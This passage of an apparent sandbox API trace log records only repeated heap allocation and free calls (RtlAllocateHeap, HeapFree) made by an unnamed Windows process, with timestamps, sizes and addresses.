lpMem=0xc71f28 | out: hHeap=0xc50000) returned 1 [0030.668] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc73888 [0030.668] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75f98 | out: hHeap=0xc50000) returned 1 [0030.668] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75358 [0030.668] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0xc) returned 0xc73b58 [0030.668] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.668] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75358 | out: hHeap=0xc50000) returned 1 [0030.668] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x88) returned 0xc765c8 [0030.668] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73b58 | out: hHeap=0xc50000) returned 1 [0030.668] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc78a80 [0030.668] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc765c8 | out: hHeap=0xc50000) returned 1 [0030.668] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.668] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.668] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.668] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.668] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.668] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.668] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.668] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.668] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.668] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.669] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.669] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.669] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.669] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.669] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.669] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.669] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.669] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.669] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.669] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.669] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.669] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.669] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.669] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.669] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.669] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.669] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.669] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.669] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.669] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.669] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.669] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.669] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.669] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.669] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.669] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.669] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.669] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.669] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.669] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.669] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.669] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.669] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.669] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.669] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.669] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.669] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.669] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.669] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.669] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.669] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.669] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.669] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.669] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.670] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.670] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.670] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.670] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.670] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.670] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.670] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.670] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.670] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.780] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc719d8 [0030.780] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71d08 [0030.780] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71378 [0030.780] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc757b8 [0030.780] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71378 | out: hHeap=0xc50000) returned 1 [0030.780] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76418 [0030.780] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x108) returned 0xc79020 [0030.780] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x4) returned 0xc66f88 [0030.780] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc798e0 [0030.780] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.780] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc79480 [0030.780] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ae8 [0030.781] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x10c) returned 0xc79598 [0030.781] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.781] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0xc) returned 0xc73ae0 [0030.781] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75698 [0030.781] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0030.781] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc79138 [0030.781] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75698 | out: hHeap=0xc50000) returned 1 [0030.781] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75348 [0030.781] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0xc) returned 0xc73c18 [0030.781] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.781] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75348 | out: hHeap=0xc50000) returned 1 [0030.781] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x88) returned 0xc75698 [0030.781] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73c18 | out: hHeap=0xc50000) returned 1 [0030.781] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc796b0 [0030.781] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75698 | out: hHeap=0xc50000) returned 1 [0030.781] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.781] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.781] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.781] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.781] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.781] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.781] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.781] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.781] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.781] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.781] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.781] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.781] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.781] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.781] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.781] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.781] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.781] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.782] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.782] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.782] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.782] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.782] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.782] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.782] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.782] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.782] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.782] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.782] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.782] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.782] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.782] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.782] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.782] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.782] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.782] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.782] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.782] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.782] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.782] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.782] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.782] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.782] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.782] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.782] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.782] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.782] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.782] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.782] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.782] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.782] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.783] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.783] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.783] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.783] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.783] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.783] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.783] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.783] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.783] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.783] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.783] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.783] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.783] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.783] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.783] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.783] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.783] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.783] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.783] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.783] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.783] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.783] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.783] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.783] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.783] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.783] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.783] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.783] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.783] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.783] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.783] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.783] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.784] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.784] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.784] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.784] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.784] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.784] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.784] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.784] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.784] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.784] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.784] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.784] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.784] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.784] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.784] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.784] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.784] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.784] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc79480 | out: hHeap=0xc50000) returned 1 [0030.784] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc79138 | out: hHeap=0xc50000) returned 1 [0030.784] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc79598 | out: hHeap=0xc50000) returned 1 [0030.784] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc796b0 | out: hHeap=0xc50000) returned 1 [0030.784] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73ae0 | out: hHeap=0xc50000) returned 1 [0030.784] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc762f8 [0030.784] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76148 [0030.784] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75728 [0030.784] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75b18 [0030.784] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75cc8 [0030.784] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc761d8 [0030.784] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75698 [0030.784] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75c38 [0030.784] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75968 [0030.785] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75848 [0030.785] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75d58 [0030.785] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76268 [0030.785] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc758d8 [0030.785] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76388 [0030.785] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc760b8 [0030.785] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc764a8 [0030.785] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76538 [0030.785] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc765c8 [0030.785] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc759f8 [0030.785] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75ba8 [0030.785] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75a88 [0030.785] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75de8 [0030.785] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75e78 [0030.785] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75f08 [0030.785] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75f98 [0030.785] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76028 [0030.785] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc77ca8 [0030.785] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc78758 [0030.785] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc787e8 [0030.785] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc78878 [0030.785] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc78098 [0030.785] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc781b8 [0030.790] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc762f8 | out: hHeap=0xc50000) returned 1 [0030.790] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76148 | out: hHeap=0xc50000) returned 1 [0030.791] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75728 | out: hHeap=0xc50000) returned 1 [0030.791] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b18 | out: hHeap=0xc50000) returned 1 [0030.791] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75cc8 | out: hHeap=0xc50000) returned 1 [0030.791] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc761d8 | out: hHeap=0xc50000) returned 1 [0030.791] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75698 | out: hHeap=0xc50000) returned 1 [0030.791] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c38 | out: hHeap=0xc50000) returned 1 [0030.791] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75968 | out: hHeap=0xc50000) returned 1 [0030.791] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75848 | out: hHeap=0xc50000) returned 1 [0030.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75d58 | out: hHeap=0xc50000) returned 1 [0030.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76268 | out: hHeap=0xc50000) returned 1 